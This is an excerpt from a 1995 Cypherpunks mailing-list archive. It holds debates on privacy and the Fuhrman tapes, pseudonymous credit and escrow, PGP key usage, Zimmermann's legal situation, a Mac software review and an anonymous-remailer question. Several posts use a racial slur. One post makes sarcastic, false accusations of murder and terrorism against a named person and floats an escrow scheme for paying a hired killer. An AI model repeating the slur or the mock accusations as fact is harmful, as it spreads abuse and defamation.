>that the real threat to privacy is not the guvmint, but all of
>the yoyos with their little cam corders running around pointing them
>at people.
>
>Security cameras in ATMS and at airline ticket counters do more
>to threaten you privacy than do FIBBIE wiretaps, and PGP won't
>protect you from them. (and usually neither will the courts).

I absolutely agree with this, though this doesn't mean I'll stop worrying
about the government's plans for key escrow (GAK), about limits on key
lengths, or about other efforts to thwart strong security.

But clearly the "technologies of surveillance," ranging from
massively-cross-correlated mailing lists to smaller and cheaper and more
ubiquitous video cameras, are very nearly an equal threat.

(Lots of issues, from the nearly universal requests for Social Security
Numbers, to the growing powers of courts to compel the disclosure of
private documents, to, well, you folks all know the trends.)

Folks like us should not be lobbying for limitations on what other private
individuals or companies are doing, but should concentrate first, on
technological alternatives (encryption, unlinkable credentials, digital
money, that sort of thing) and second, on educating others that security
and privacy is best self-arranged and is rarely accomplished by government
assuming the role of protector.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 1 Sep 95 14:01:12 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Fuhrman needed a digital pseudonym!
In-Reply-To: <ac6c95850302100486b3@[205.199.118.202]>
Message-ID: <9509012100.AA07333@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

I almost always agree with Tim.  This time I have to differ -- I think
his outrage at the course of the OJ trial has fogged his head.

> * This post is primarily about the role of pseudonyms, not the OJ trial or
> the testimony/tapes involving Mark Fuhrman.

Well, it's hard to see that from reading the rest of it.


> Before you folks jump on the "racist" Mark Fuhrman, think about the
> "surveillance state" issues. While it was not any government organization
> that taped Fuhrman's comments, there are some real issues involved in how
> deeply and how far back we want to "mine" comments made by people. Some
> real issues of privacy.

I don't see any "surveillance state" issue.  Fuhrman openly agreed to
speak to the screenwriter.  AFAIK, he had no reason to believe the
screenwriter wouldn't tell anyone else.  Nor should he have counted on
that anyway.  Any loss of credibility (or other penalty) he receives
is entirely deserved, IMO.

If he didn't want his words coming back to "haunt" him, he shouldn't
have spoken them, in this setting at least, whether they were sincere
or merely an attempt to puff himself up in her eyes.  Speaking as a
"consultant" (or whatever he imagined his relationship with the
screenwriter to be) isn't the same as speaking in confidence to your
best friend in a private setting anyway.


> Anyone in favor of heading off the "surveillance society" should be alarmed
> at this development. As tape recorders and video cameras proliferate,
> comments may be compiled, taken out of context, and used as evidence.

I am not alarmed in the least (by this development, anyway).  There's
no evidence that Fuhrman's comments are being taken out of context.
Fuhrman freely entered into the arrangement wherein his comments were
recorded.  Let's face it, the most likely explanation here is that
Fuhrman is a lying scumbag.

The fact that Fuhrman may be a lying scumbag doesn't make OJ any less
guilty.  However, it does throw a lot of suspicion on Fuhrman's
testimony.  OJ's entire defense has been based on the claim that
Fuhrman and other LAPD members lied and otherwise conspired in order
to frame him.  These tapes are clearly appropriate to that defense
whether you believe the defense a valid one or not.


> But have people given up the right to speak "for themselves" in private? If
> there is no solid evidence that Fuhrman actually committed any crimes, but
> only appeared to be puffing himself up, a la a Wambaugh wannabee, then why
> are his "racist" and "sexist" comments deemed so important as to have
> derailed the trial for the last couple of weeks?

The fact that Fuhrman's comments are racist or sexist are not the
point.  What is important is that he lied in court about having made
those statements.  If he or the prosecution believes that a case can
be made that Fuhrman was just puffing himself up, then they should try
to convince the jury of that.


> To be sure, there are valid trial issues:
> 
> -- Did he misspeak, misremember, or lie when he said he had "never" used
> the word "nigger" in the past 10 years?

Yes, IMO, this is the important issue.  Anyone who dispenses racial
epithets with the ease he apparently displayed in the tapes is an
idiot to have made such a claim whether the tapes were puffery or not.


> -- If this is perjury, how does it affect other evidence? (I'm not a
> lawyer, but I grok from the comments on CNN that this has to do with
> whether his testimony was supportive of other evidence, "cumulative," and
> related issues.)

IANAL, but let me just say that if I were on the jury, I don't think
I'd believe a single word he'd said during the trial.  I think that
I would probably still believe him to be guilty, anyway, but it's hard
to be sure without having heard only what the jury has heard.


> -- Does this possible misspeaking, misremembering, or lying have anything
> to do with whether he planted the bloody glove?

I don't know.  I'm kinda amazed that Ito has said that other portions
of his taped words won't be used, such as those parts where he describes
manufacturing evidence against the accused.  That seems to me to be
clearly relevant, at least as relevant as his use of the n-word.


> Anyway, I am greatly disturbed by this "mining" of ancient comments, made
> to a screenwriter.

Not me.  A few weeks there was a thread concerning the use of
information by private "reputation" bureaus.  I can't find the thread
in the archives but I seem to recall you defending the right of
private entities to keep and distribute such information (my apologies
if this was someone else).  Anyway, to me, these tapes fall clearly in
the same domain.  This screenwriter isn't a government agency, the
information was freely given, and the screenwriter has every right to
offer it for whatever purpose she deems appropriate, for free or
for money (barring any agreements to the contrary, of which I have
heard nothing).


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Fri, 1 Sep 95 17:46:10 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: A problem with anonymity
Message-ID: <8B04409.00030003D4.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> This is one thing that _bonding_ is designed to partially ameliorate. One
TC> posts a bond which is greater than the amount being carried, or at least is

  A variation of a bond is an escrow agent....

     Overload Alert: I use "escrow" here in the more mundane sense of
     the folks who collect your real estate taxes and homeowners'
     insurance from you 1/12th at a time along with your mortgage
     payment, for instance.

  If the buyer has a =nonymous= agent to recieve the payment, which is
only released to the seller upon proof(s) of performance (whether in
lump sum or on a schedule of staged payments tied to specific milestones
in a long-term project) then the buyer has someone to go after in the
event of such shenannigans.

TC> There are still scams and manouvers to thwart this reputation capital
TC> scheme. The agent planning to "defect" (default, split, abscond, renege,
TC> etc.) can try to pile up as many pending transactions as possible,
TC> anticipating that the various transactees will be unaware of each other.

  And the escrow method dynamically scales to meet this threat, whereas
the bond is static.

  Of course, the escrow agent will extract his pound of flesh, just as
any other form of insurance. Such is the nature of life.




 * A Liberal puts your money where his mouth is.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 1 Sep 95 14:14:53 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Different Keys for Signing and Encrypting
In-Reply-To: <199509011912.MAA29475@ix8.ix.netcom.com>
Message-ID: <9509012114.AA00959@m37-332-6.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> unfortunately, you can't predict their behavior, and if you change
> encryption keys more often than signature keys, they'll load the
> newest encryption key last.

Actually, the most recently-added key will be the one that is
used.. So updating your encryption key works fine, since the most
recent encryption key will be on top, and hense used first.

> For the problem that started this discussion, though, there's no good
> solution.  Since the Bad Guys _can_ encrypt a message to you with your
> signature key, and send it to you by anonymous remailer, they can
> plant a reason to suspect that you may have evidence encrypted with
> that key.

True.. To get around this problem you need the concept of a two-key
certificate... However a rogue user could still use the signature
key to encrypt, so I'm not sure that even this would help the problem.

-derek



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 17:07:53 PDT
To: <cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6cec3b010210049826@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:45 AM 9/2/95, David Murray wrote:

>I've often thought that in a system of digital pseudonyms, where no-one need
>trade with a negative reputation (a reputation deficit?), something like
>Akerlof's Market for Lemons will arise, and _all_ pseudonyms will be treated
>as (reputationally) worthless.

Doubtful, as we already have evidence that people are treating some digital
pseudonyms as reputationally valuable. Examples abound.

>[Akerlof, if I remember my economics right (and I am confident that I will
>be corrected if I don't) analysed a market for used cars. There were two
>types of cars: good ones, and lemons. A purchaser couldn't tell the difference
>until she had bought the car. Since the expected value of a used car was less
>than the value of a good car, purchasers wouldn't pay the good car price.
>But that would mean owners of good cars wouldn't offer them for sale (in
>this market). So the only cars for sale would be lemons :-)]

I haven't encountered this example, but it clearly misses some important
real-world issues. First, people buying used cars are strongly advised to
take the car to an independent mechanic to be checked out (a kind of
variant of the "cut-and-choose" protocol at work). This often reveals
lemons. Second, people take test drives, look under the hood, kick the
tires, etc. This also often reveals lemons. Third, the reputation of the
used car dealer is, despite nearly a century of jokes to the contrary,
often very important.

The last two cars I've bought I bought used--albeit with low mileage on
each--from car dealers. I took test drives and got a limited warranty in
each case. The first car I drove for 12 years with essentially no problems,
the second I've been driving for almost 3 years.

Like a lot of simple game-theoretic models, the application to the real
world is quite different.

But I certainly agree that crypto will reignite interest in analyses of
such game theory questions. Another way of viewing anonymity vs.
non-anonymity is that knowing the True Name of a party with whom one trades
is just _one element_ of a transaction. By no means is it essential.

(Think of various trading situations where one has no idea of the True Name
of the other parties: cash-and-carry transactions, flea markets, many
international trade arrangements, etc. As we have discussed in past
discussions of anarchy, the international trading regime is essentially an
anarchy, in that no Higher Authority exists to resolve disputes in a
top-down way...the so-called "Law Merchant" evolved to resolve disputes in
such trading situations.)


>As Tim points out, this is a non-crypto problem as well, and devices such as
>bonds or (which are game-theoretically similar) expensive advertising or
>plush premises [if they spent an unrefundable $20million on the Rolling
>Stones, they're not likely to throw it all away by ripping you off for
>$100 ;-)] are used to convince potential customers of one's bona fides.
>
>How these transfer to the world of cyber-finance, I'm not sure, but I suspect
>it leaves a role for True Names in the management of credit risk: as escrow
>agents, middlemen, clearing houses etc. [Although, having said that, if the
>Akerlof analysis applies, you just *can't* grant (unsecured) credit to
>pseudonyms - the percentage of defaulters will be 100...] But these Names are
>True only in the sense that they are juridically persistent (that is, if
>they transact today, they can be sued tomorrow), and need not be traceable
>to any True People (Warm Bodies?) - anonymously held corporations, for
>example.
>
>If you can't rely on the unsecured promise of a digital pseudonym, and you
>can't accept reputation as 'security', how do you extend credit?

I am willing to extend some amound of credit to PrOduct Cypher, Black
Unicorn, etc., based on their past reputation and on the fact that I can
show to others the transactions into which their pseudonyms entered and
thus expose them if they default. Now _how much_ I'm willing to extend is
of course a more complicated issue, but the principal is still there: a
purely digital pseudonym, with no possibility of being tied to a True Name,
can still be extended credit....I just said I would do so.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Fri, 1 Sep 95 15:09:28 PDT
To: cypherpunks@toad.com
Subject: Fuhrman needed a digital pseudonym!
Message-ID: <199509012218.RAA23055@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>From: tcmay@got.net (Timothy C. May)
>Subject: Fuhrman needed a digital pseudonym!

>Before you folks jump on the "racist" Mark Fuhrman, think about the
>"surveillance state" issues. While it was not any government organization
>that taped Fuhrman's comments, there are some real issues involved in how
>deeply and how far back we want to "mine" comments made by people. Some
>real issues of privacy.
>
>The Mark Fuhrmans of the future may be interested in using technologies to
>protect their privacy, to give them "plausible deniability" should their
>recorded words come back to haunt them.
>
...
>* And the issue of "mining" of ancient records, especially as technology
>makes the recording of sounds, the taping of sights, and the archiving of
>electronic messages so much easier.
>
...
>What really bothers me, as it relates to the pro-privacy themes of this
>list, is the reaching back many years to comments made by a witness--Mark
>Fuhrman--to a screenplay writer. Because she kept audiotapes, going back 10
>years, these comments may likely strongly influence the verdict in this
>"trial of the century."
>
>Anyone in favor of heading off the "surveillance society" should be alarmed
>at this development. As tape recorders and video cameras proliferate,
>comments may be compiled, taken out of context, and used as evidence.
...
>
>--Tim May
>
If you've ever watched Not_at_all_Funny Home Videos or any of the
American Urinal school of tabloid television, you soon start feeling
that the real threat to privacy is not the guvmint, but all of
the yoyos with their little cam corders running around pointing them
at people.

Security cameras in ATMS and at airline ticket counters do more
to threaten you privacy than do FIBBIE wiretaps, and PGP won't
protect you from them. (and usually neither will the courts).

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Fri, 1 Sep 95 17:19:06 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
Message-ID: <jw5RwkkAs2nN084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 01 Sep 1995, Michael Froomkin <mfroomki@umiami.ir.miami.edu> wrote:

> I think he would have to be charged first.  Have I missed something?
> PS when does the statute of limitations run out?

June '96.  Zimmermann and Dubois appeared on a local talk radio show
recently; a friend happened to catch the program, taped it, and played
excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 18:13:57 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6cfcfb0202100487ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:12 PM 9/1/95, MONTY HARDER wrote:
>TC> This is one thing that _bonding_ is designed to partially ameliorate. One
>TC> posts a bond which is greater than the amount being carried, or at least is
>
>  A variation of a bond is an escrow agent....
>
>     Overload Alert: I use "escrow" here in the more mundane sense of
>     the folks who collect your real estate taxes and homeowners'
>     insurance from you 1/12th at a time along with your mortgage
>     payment, for instance.
>
>  If the buyer has a =nonymous= agent to recieve the payment, which is
>only released to the seller upon proof(s) of performance (whether in
>lump sum or on a schedule of staged payments tied to specific milestones
>in a long-term project) then the buyer has someone to go after in the
>event of such shenannigans.

Oh, I agree, of course. Except that the escrow agent need not be a
"nonymous" agent, to use Monty's terminology here.

The third party escrow agent can of course be a digital pseudonym.

(As I keep saying, having the True Name--whatever that means these days--is
only one facet, one factor of the overall equation. In some cases, very
important, in other cases, less important.)

The canonical--if morbid--example is the "Al's Murder Escrow" agent. Al
holds the digital money (deposited anonymously, etc.) and doesn't pay the
hitter until certain conditions are met.

(Chaum has schemes to partly deal with this, but "money mixes" eliminate
traceability, but may introduce other issues.)

There are of course issues involving the escrow agent deciding not to pay,
etc. But most escrow services, like banks, make more money by staying in
business than by defrauding customers.

(I mention banks because, when you look at it closely, today's banks can
quite easily claim that a customer made a withdrawal when he didn't. That
they don't says more about the nature of persistent businesses than about
any government oversight or security features. This is a side point, but it
bears keeping in mind that the real world of banks and businesses, etc., is
not fully secure, either. And yet it mostly works pretty well. The reasons
for this are interesting to consider.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 1 Sep 95 15:34:33 PDT
To: Deranged Mutant <rrothenb@ic.sunysb.edu>
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509011410.KAA20234@libws1.ic.sunysb.edu>
Message-ID: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think he would have to be charged first.  Have I missed something?
PS when does the statute of limitations run out?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot there.  And humid.  
Coral Gables, FL 33124 USA |                  But I'm elsewhere....
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 18:51:13 PDT
To: cypherpunks@toad.com
Subject: Macintosh Users: "SpeedDoubler"
Message-ID: <ac6d03dc0302100425a6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



For you Macintosh users, I thought I'd share with you my experiences with
SpeedDoubler, a new utility that (effectively) doubles or even triples
performance of many applications that still are heavily dependent on 68K
code (as opposed to purely PowerPC code).

My PowerMac 7100av is currently running at 80 MHz, with a 512K L2 cache,
and 40 MB of physical RAM. (I can remember when 32K of "core" was a huge
amount, and I can remember when Intel supplied 8 MB to CDC for their
"Plato" system...at that time, one of the largest solid state memory
installations ever.)

SpeedDoubler, from Connectix, is a $60-70 (street) product that takes 68K
code and makes various optimizations for the PPC. It's effectively the 68K
emulator that Apple should have provided.

(For you non-Mac users who are reading this, this technology of
intercepting and translating code, is likely to be used to get higher
performance out of code written ostensibly for one CPU but actually run on
a later iteration of the processor. Such as the Pentium or P6 in running
16-bit code.)

In Speedometer, I saw a 3.9x increase in "CPU"-related tasks (for 68K
code), and a 2.4x increase in a SmalltalkAgents application which is only
available at this time in 68K code form.

Even the Finder runs faster, as various parts of it are still written in
68K code.

So, as many programs are still in 68K code form, and not yet rewritten for
the PPC, SpeedDoubler effectively gives you a machine that is almost twice
as fast.

There may be a few incompatibilities, and I would suggest you read
comp.sys.mac.apps and other groups to verify that your critical apps are
not having any problems.

All I can say is that I'm very happy.

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mr.xxx@ce.flashnet.it (Mr.xxx@ce.flashnet.it)
Date: Wed, 20 Sep 95 17:17:40 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9509201546595494@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Fri, 1 Sep 1995 21:00:32 +0200
To: cypherpunks@toad.com
From: Pasquale Piombino <mr.xxx@ce.flashnet.it>

Hi all,

I am searching PGP software.

Does anyone know where I can download it?


Thanks for answers.


-+-+------------------->->--------------------------------:-Q------------
=B0  Pasquale Piombino                                                    |
|   Via Colombo, 35                    Email: mr.xxx@ce.flashnet.it     =B0
=B0   I-81100 CASERTA                    Phone - Fax: 0039 823 329152     |
|       ITALY                                                           =B0
+-+-------------8-)---------------------:-))-----------------:-o---------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David A. Wagner" <dawagner@phoenix.Princeton.EDU>
Date: Fri, 1 Sep 95 16:10:20 PDT
To: Ted_Anderson@transarc.com
Subject: Re: Cryptanalysis of S-1
In-Reply-To: <skEmR=X0BwwMM0o3Im@transarc.com>
Message-ID: <9509012308.AA17004@tucson.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Ted_Anderson@transarc.com writes:
> Further we have a concrete design principle: the per-round sub-keys
> should not repeat.

Right.  In fact, this design principle has been known for a long time:
the earliest reference I know of is

@inproceedings{subkeys-important,
        author = {Edna K. Grossman and Bryant Tuckerman},
        title = {Analysis of a Weakened {Feistel}-like Cipher},
        booktitle = {1978 International Conference on Communications},
        pages = {46.3.1--46.3.5},
        publisher = {Alger Press Limited},
        year = {1978},
        annote = {Feistel ciphers with identical subkeys in each round
                        are very weak}
}

-------------------------------------------------------------------------------
David Wagner                                             dawagner@princeton.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 19:12:02 PDT
To: "Robert A. Hayden" <mfroomki@umiami.ir.miami.edu>
Subject: Re: Phil Zimmermann/Amnesty International?
Message-ID: <ac6d0b5b04021004e861@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 AM 9/2/95, Robert A. Hayden wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Fri, 1 Sep 1995, Michael Froomkin wrote:
>
>> I think he would have to be charged first.  Have I missed something?
>> PS when does the statute of limitations run out?
>
>I'm assuming that the statute of limitations has run out on most of these
>things ( I don't know CA law, except to know it's weird :-)
>What I'm concerned about, and nobody seems to have picked up on it, is
>that one of the transcripts said that he and a partner beat up a bunch of
>perps after they tried to surrender and that one of them died(!!).
>That's murder in my book, and there is non statute of limitations on
>that, even in California...

Zimmermann and which partner?

If it was Charlie Merritt, then all I can say is that I'm surprised. Kelly
Goen...now there's a possibility.

--Tim May

P.S. As the thread title--"Re: Phil Zimmermann/Amnesty
International?"--suggests, Phil Z. is the subject being discussed. Gary
Jeffers made the bizarre speculation that Amnesty International might want
to consider Phil a "prisoner of conscience" or a "political prisoner," or
somesuch. All Michael Froomkin and others of us were pointing out is that
this would be rather difficult, given that Phil has not even been charged,
let alone tried, let alone imprisoned.

How Mark Furhman migrated into this thread is beyond me. But, then, he
killed Ron and Nicole, planted the glove to frame the nigger he hated so
much, and was also involved in the bombing of the WTC. That he helped Phil
export PGP is thus not surprising.


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ROBO Mixmaster Remailer <robo@c2.org>
Date: Fri, 1 Sep 95 19:36:18 PDT
To: toad.com.loki@obscura.com
Subject: Direct Socket to Remailer?
Message-ID: <199509020225.TAA29123@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I've heard of telnetting to port 25 to send SEMI-untraceable e-mail.
The procedure, quite frankly, sounds rather complicated.

Most of my mail that I don't want traced goes through the Mixmaster
remailer network.  I'm using Winsock-compatible software via a PPP
connection.  Is it possible, for example, to tell my mailer software
to use the remailer itself, such as "remail.obscura.com" as the mail
host, rather than "mail.myISP.com"?  Will it work, at least for
sending, without having an account at "obscura.com", or whatever
remailer?  Would that be less traceable than sending it through my
ISP's mail host?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 1 Sep 95 17:50:45 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
Message-ID: <Pine.ULT.3.91.950901194832.9879C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Sep 1995, Michael Froomkin wrote:

> I think he would have to be charged first.  Have I missed something?
> PS when does the statute of limitations run out?

I'm assuming that the statute of limitations has run out on most of these 
things ( I don't know CA law, except to know it's weird :-)
What I'm concerned about, and nobody seems to have picked up on it, is 
that one of the transcripts said that he and a partner beat up a bunch of 
perps after they tried to surrender and that one of them died(!!).  
That's murder in my book, and there is non statute of limitations on 
that, even in California...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMEeOOzokqlyVGmCFAQHB1gP/bGIG1BqSiM7Fmc1H4fEU3Osg/wwBz31T
5sjms6JX9Z5ekW/oL4I3QDnqrW5GiMfWHdJDRNhYU2cQx0+8V6V8muiah/GO/q+P
8v1Hg0nqYW0yBCROrD/S3kfjLViqCfHWo7S5/T9pjDnF3Dq8KT5tRrAKZrTQVfKL
B9ZhTLqqwXk=
=eFZv
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++>(+)$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 1 Sep 95 17:51:13 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
Message-ID: <Pine.ULT.3.91.950901195055.9879D-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 1 Sep 1995, Michael Froomkin wrote:

> I think he would have to be charged first.  Have I missed something?
> PS when does the statute of limitations run out?

ARGH!  Shit.  I got my threads confused, thought this about about furman 
and the OJ Circus.  It's been a long week.  Sorry folx.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMEeOcjokqlyVGmCFAQGz2QP+IVwINZmPIQ14Kx4GpMJqjLNTWZba87cc
3QhQxbDQMD5CCSbqGsMyQ899jm/lUxdglBmMvjGIz85uSyg9b5gIinyfKs3lZKFd
ilICPOJ49r/C/wH2CaokuDCFtSOGLdOL2M7tpV+zNKiUtIk4vbm34T4COvnjy+g1
z3MZsDpSugY=
=M7M5
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++>(+)$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 1 Sep 95 17:58:17 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
Message-ID: <9509020057.AA17337@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I think that two Amnesty policies are being confused. Amnesty does protest on 
behalf of prisoners of concience in all countries. It also has a rule which means 
that a group making a protest should come from outside the country concerned, 
this is a sensible means of preventing Amnesty becomming a vehicle for partisan 
protests. They have similar rules for when they send observers etc.

I don't think that Phil necessarily has to be arrested though. Amnesty might well 
wish to send someone to the trial to act as an observer.

		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pasquale Piombino <mr.xxx@ce.flashnet.it>
Date: Fri, 1 Sep 95 12:00:27 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509011900.VAA01399@ns.ce.flashnet.it>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

I am searching PGP software.

Does anyone know where I can download it?


Thanks for answers.


-+-+------------------->->--------------------------------:-Q------------
  Pasquale Piombino                                                    |
|   Via Colombo, 35                    Email: mr.xxx@ce.flashnet.it     
   I-81100 CASERTA                    Phone - Fax: 0039 823 329152     |
|       ITALY                                                           
+-+-------------8-)---------------------:-))-----------------:-o---------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey, Chief Technologist, Looking Glass Technologies)
Date: Fri, 1 Sep 95 22:07:18 PDT
To: cypherpunks@toad.com
Subject: FSTC - Request for Info
Message-ID: <v02110105ac6d964ae3a2@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,
 I am now looking for pointers into this mystical coonsortium of financial
wizards... Also do any of you know about online issues pertaining to new
network adaptations of Unisys's proprietary banking protocols or the
FEDLINE stuff?


TIA
Todd

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 21:44:22 PDT
To: CYPHERPUNKS@toad.com
Subject: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <ac6d2ced00021004ee17@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've been asked by two people in e-mail what the "Cyphernomicon" I referred
